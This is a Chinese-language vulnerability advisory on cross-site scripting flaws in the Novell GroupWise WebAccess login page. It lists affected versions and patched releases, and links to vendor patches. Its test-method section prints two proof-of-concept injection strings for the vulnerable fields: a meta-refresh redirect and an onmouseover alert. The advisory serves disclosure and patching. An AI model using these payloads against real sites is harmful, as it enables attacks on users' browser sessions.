安全研究

安全漏洞
Novell GroupWise WebAccess gw/webacc多个跨站脚本漏洞

发布日期:2009-05-21
更新日期:2009-05-22

受影响系统:
Novell Groupwise 8.0
Novell Groupwise 7.0
不受影响系统:
Novell Groupwise 8.0 HP2
Novell Groupwise 7.03 HP3
描述:
BUGTRAQ  ID: 35061
CVE(CAN) ID: CVE-2009-1635,CVE-2009-1762

Novell GroupWise是一款跨平台协作软件。

Groupwise WebAccess的登录页面(https://www.website.com/gw/webacc )没有正确地验证用户在登陆请求中所提交的GWAP.version、User.Theme.index、User.lang等字段,远程攻击者可以通过提交恶意请求执行跨站脚本攻击,导致在用户浏览器会话中执行任意代码。

<*来源:Scott White
  
  链接:http://marc.info/?l=bugtraq&m=124292801717095&w=2
        http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=7003271&sliceId=1&docTypeID=DT_TID_1_1&dialogID=56809444&stateId=0%200%2056811292
        http://secunia.com/advisories/35177/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

"/><meta http-equiv="refresh" content="0; url=http://www.securestate.com" />
" /><div onmouseover="alert('xss')" style="javascript:visibility:visible;">

建议:
厂商补丁:

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://support.novell.com/security-alerts

浏览次数:2328
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障